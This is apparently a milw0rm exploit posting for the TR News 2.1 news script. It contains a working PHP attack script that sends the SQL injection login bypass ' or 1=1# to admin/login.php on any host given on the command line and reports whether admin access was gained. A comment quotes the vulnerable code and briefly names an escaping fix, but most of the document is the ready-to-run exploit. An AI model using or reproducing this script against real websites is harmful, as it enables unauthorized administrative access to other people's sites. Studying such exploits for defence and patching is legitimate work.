TR News <= 2.1 (login.php) Remote Login Bypass Exploit

&#60;?php error_reporting(0); /* ------------------------------------------------------ TR News &#60;= 2.1 (login.php) Remote Login ByPass Exploit ------------------------------------------------------ By StAkeR[at]hotmail[dot]it http://www.easy-script.com/scripts-dl/trscript-21.zip File admin/login.php 1. &#60;? 2. if(isset($_POST[&#39;login_ad&#39;]) && ($_POST[&#39;password&#39;])) 3. { 4. include(&#34;../include/connexion.php&#34;); 5. $login=$_POST[&#34;login_ad&#34;]; 6. $pass=md5($_POST[&#34;password&#34;]); 7. $sql=&#34;SELECT * FROM tr_user_news WHERE pseudo=&#39;$login&#39; AND pass=&#39;$pass&#39;;&#34;; 8. $p = mysql_query($sql); 9. $row = mysql_fetch_assoc($p); 10. $admin = $row[&#39;admin&#39;]; 11. if($admin != 1) $login = $_POST&#34;login_ad&#34;]; isn&#39;t escaped,so you can insert SQL code... how to fix? sanize $login with mysql_real_escape_string or htmlentities NOTE: if the website is vulnerable,you must go to admin/login.php Username: &#39; or 1=1# Password: no-deface */ if(preg_match(&#39;/http://(.+?)/i&#39;,$argv[1]) or empty($argv[1])) athos(); $host = explode(&#39;/&#39;,$argv[1]); $auth = &#34;login_ad=%27+or+1%3D1%23&password=athos&#34;; $data = &#34;POST /$host[1]/admin/login.php HTTP/1.1\r\n&#34;. &#34;Host: $host[0]\r\n&#34;. &#34;Content-Type: application/x-www-form-urlencoded\r\n&#34;. &#34;Content-Length: &#34;.strlen($auth).&#34;\r\n\r\n&#34;. &#34;$auth\r\n\r\n&#34;; if(!$socket = fsockopen($host[0],80)) die(&#34;fsockopen() error!\n&#34;); if(!fputs($socket,$data)) die(&#34;fputs() error!\n&#34;); while(!feof($socket)) { $content .= fgets($socket); } fclose($socket); if(preg_match(&#34;/location: main\.php\?mode=main/i&#34;,$content)) { exploiting(); echo &#34;\n[+] Exploit Successfully!\n[+] Site Vulnerable\n&#34;; exit; } else { exploiting(); echo &#34;\n[+] Exploit Failed!\n[+] Site Not Vulnerable!\n&#34;; exit; } function athos() { global $argv; echo &#34;[+] TR News &#60;= 2.1 (login.php) Remote Login ByPass Exploit\n&#34;; echo &#34;[+] Usage: php $argv[0] [host/path]\r\n&#34;; exit; } function exploiting() { echo &#34;[+] Exploiting&#34;; for($i=0;$i&#60;=3;$i++) { echo &#34;.&#34;; sleep(1); } } # milw0rm.com [2008-11-04]